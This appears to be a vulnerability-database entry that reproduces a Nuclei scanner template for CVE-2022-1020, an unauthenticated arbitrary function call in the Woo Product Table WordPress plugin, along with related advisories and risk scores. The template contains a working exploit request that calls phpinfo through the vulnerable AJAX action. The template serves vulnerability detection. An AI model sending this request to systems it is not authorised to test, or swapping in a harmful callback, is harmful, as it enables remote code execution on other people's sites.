WordPress WooCommerce <3.1.2 - Arbitrary Function Call

Reported by ProjectDiscovery, 03 Jul 2026 03:01:05
Type: nuclei
Source: github.com
Views: 23

WordPress WooCommerce <3.1.2 - Arbitrary Function Call. Allows remote code execution

Related

Reporter | Title | Published | Family
ATTACKERKB | CVE-2022-1020 | 18 Apr 2022 18:15 | attackerkb
Circl | CVE-2022-1020 | 18 Apr 2022 22:23 | circl
CNNVD | WordPress plugin WooCommerce security vulnerability | 18 Apr 2022 00:00 | cnnvd
CVE | CVE-2022-1020 | 18 Apr 2022 17:10 | cve
Cvelist | CVE-2022-1020 Woo Product Table < 3.1.2 - Unauthenticated Arbitrary Function Call | 18 Apr 2022 17:10 | cvelist
NVD | CVE-2022-1020 | 18 Apr 2022 18:15 | nvd
OSV | CVE-2022-1020 | 18 Apr 2022 18:15 | osv
Patchstack | WordPress Product Table for WooCommerce plugin <= 3.1.1 - Unauthenticated Arbitrary Function Call vulnerability | 23 Mar 2022 00:00 | patchstack
Prion | Cross site request forgery (csrf) | 18 Apr 2022 18:15 | prion
RedhatCVE | CVE-2022-1020 | 22 May 2025 23:29 | redhatcve

Code

id: CVE-2022-1020

info:
  name: WordPress WooCommerce <3.1.2 - Arbitrary Function Call
  author: Akincibor
  severity: critical
  description: WordPress WooCommerce plugin before 3.1.2 does not have authorisation and CSRF checks in the wpt_admin_update_notice_option AJAX action (available to both unauthenticated and authenticated users), as well as does not validate the callback parameter, allowing unauthenticated attackers to call arbitrary functions with either none or one user controlled argument.
  impact: |
    It allows remote code execution on the affected system.
  remediation: |
    Update WordPress WooCommerce plugin to version 3.1.2 or later to mitigate the vulnerability.
  reference:
    - https://wpscan.com/vulnerability/04fe89b3-8ad1-482f-a96d-759d1d3a0dd5
    - https://nvd.nist.gov/vuln/detail/CVE-2022-1020
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-1020
    cwe-id: CWE-352
    epss-score: 0.26228
    epss-percentile: 0.97746
    cpe: cpe:2.3:a:codeastrology:woo_product_table:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 1
    vendor: codeastrology
    product: woo_product_table
    framework: wordpress
  tags: cve,cve2022,wpscan,wp,wp-plugin,wordpress,unauth,codeastrology,vkev,vuln

http:
  - raw:
      - |
        POST /wp-admin/admin-ajax.php?action=wpt_admin_update_notice_option HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        option_key=a&perpose=update&callback=phpinfo

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "PHP Extension"
          - "PHP Version"
        condition: and

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        group: 1
        regex:
          - '>PHP Version <\/td><td class="v">([0-9.]+)'
        part: body
# digest: 4a0a0047304502210087d22d8031f98ef3a794279cb8ebb6d88bcf9d592ab5e53a88f64bc1729b9f8d02202e4b42df1929e110d9b24c9a0f927b82c6e4f67c76b4da6fc9490c739a82bd3d:922c64590222798bb761d5b6d8e72950

Scores (current as of 04 Feb 2026 07:00)

Vulners AI Score: 7.3 (High risk)
CVSS 2: 7.5
CVSS 3.1: 9.8
EPSS: 0.26228
Views: 23